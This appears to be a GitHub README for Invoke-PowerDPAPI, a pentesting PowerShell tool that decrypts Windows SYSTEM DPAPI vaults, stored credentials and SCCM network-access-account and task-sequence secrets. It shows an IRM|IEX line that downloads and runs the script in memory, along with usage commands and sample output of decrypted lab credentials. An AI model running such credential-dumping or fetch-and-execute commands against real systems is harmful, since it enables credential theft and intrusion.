Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

The-Viper-One/Invoke-PowerDPAPI

BranchesTags
Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Invoke-PowerDPAPI.ps1
Invoke-PowerDPAPI.ps1
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Invoke-PowerDPAPI

Invoke-PowerDPAPI is a PowerShell port of some SharpDPAPI and SharpSCCM functionality.

For the moment this is limited to SYSTEM level functions such as triaging SYSTEM master keys and decrpypting the following secrets:

  • System Vaults
  • System Credentials
  • SCCM NAA accounts (WMI / Disk)
  • SCCM Task Sequences (WMI / Disk)

Future Updates

Not all SharpDPAPI functionality will be implemented into this port. This will be limited to functionality that fits my workflow and code that I believe can be reused in further projects.

Future updates to be completed:

  • User level DPAPI
  • Automate takeover of each user logon session and decrypt each user DPAPI secret
  • SYSTEM Certificates
  • Domain Backup key support

Requirements

❗ Invoke-PowerDPAPI must be executed in a high integrity process

Load into memory

IRM "https://raw.githubusercontent.com/The-Viper-One/Invoke-PowerDPAPI/refs/heads/main/Invoke-PowerDPAPI.ps1" | IEX

Usage

Triage Everything

Runs MachineVaults, MachineCredentials, SCCM_Disk and SCCM_WMI

Invoke-PowerDPAPI MachineTriage

 

Triage MachineVaults

Invoke-PowerDPAPI MachineVaults
[*] Triaging SYSTEM Vaults

[*] Triaging Vault Folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Name               : Web Credentials 
    guidMasterKey    : {e922342f-143e-4b65-a25b-e83354a47007}
    size             : 324
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : 
    guidMasterKey    : 
    size             : 324
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Vault Policy Key
    aes128 key       : 17D5264E849A7136427830A4835B8669
    aes256 key       : 428397F3F8260174A5923BC66CC014CB2D3C4ABAFB5FFBC90D7A959DC4DC817C

 

Triage MachineCredentials

Invoke-PowerDPAPI MachineCredentials
[*] Triaging System Credentials

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 3F38B7EDDCC210906994CAC4A9077348
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 544
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    guidMasterKey    : 
    size             : 264
    flags            : 0x00000030 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data
    LastWritten      : 6/19/2025 12:18:59 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{52340B14-C919-4223-970B-103AAAFE2720} 
    TargetAlias      : 
    Comment          : 
    UserName         : ludus\domainuser 
    Credential       : password

 

Triage SCCM (WMI and Disk)

Runs SCCM_WMI and SCCM_Disk

Invoke-PowerDPAPI SCCM

 

Triage SCCM (WMI)

Invoke-PowerDPAPI SCCM_WMI
Invoke-PowerDPAPI SCCM_WMI -SaveTS # Saves Task Sequences in XML format to PWD
[+] Found 1 Network Access Account(s)
[+] Decrypting network access account credentials

    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  


    Network Access Username: ludus\sccm_naa_2 
    Network Access Password: password123 

[+] Found 2 Task Sequence(s)
[+] Decrypting Task Sequences

    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 8042
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

[+]    Task Sequence: 
<sequence version="3.10">
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>

 

Triage SCCM (Disk)

Invoke-PowerDPAPI SCCM_Disk
Invoke-PowerDPAPI SCCM_Disk -SaveTS # Saves Task Sequences in XML format to PWD
[+] Decrypting 1 network access account secrets
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

    NetworkAccessUsername: ludus\sccm_naa_2 
    NetworkAccessPassword: password123 

[+] Decrypting 1 task sequence secrets
    guidMasterKey    : {8173b631-3636-4c96-81e7-ae2c8fd60632}
    size             : 2154
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :  

<sequence version="3.10">
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Run SQL CMD" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">sqlcmd -S myserver.database.windows.net -d MyDatabase -U MyUserName -P MySecretPassword -Q "SELECT TOP 10 * FROM dbo.MyTable"</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>

 

About

Decrypt SCCM and DPAPI secrets with Powershell.

Topics

powershell sccm pentesting dpapi mecm

Resources

Readme

License

BSD-3-Clause license
Activity

Stars

40 stars

Watchers

0 watching

Forks

3 forks
Report repository

Releases

No releases published

Languages
Morty Proxy This is a proxified and sanitized view of the page, visit original site.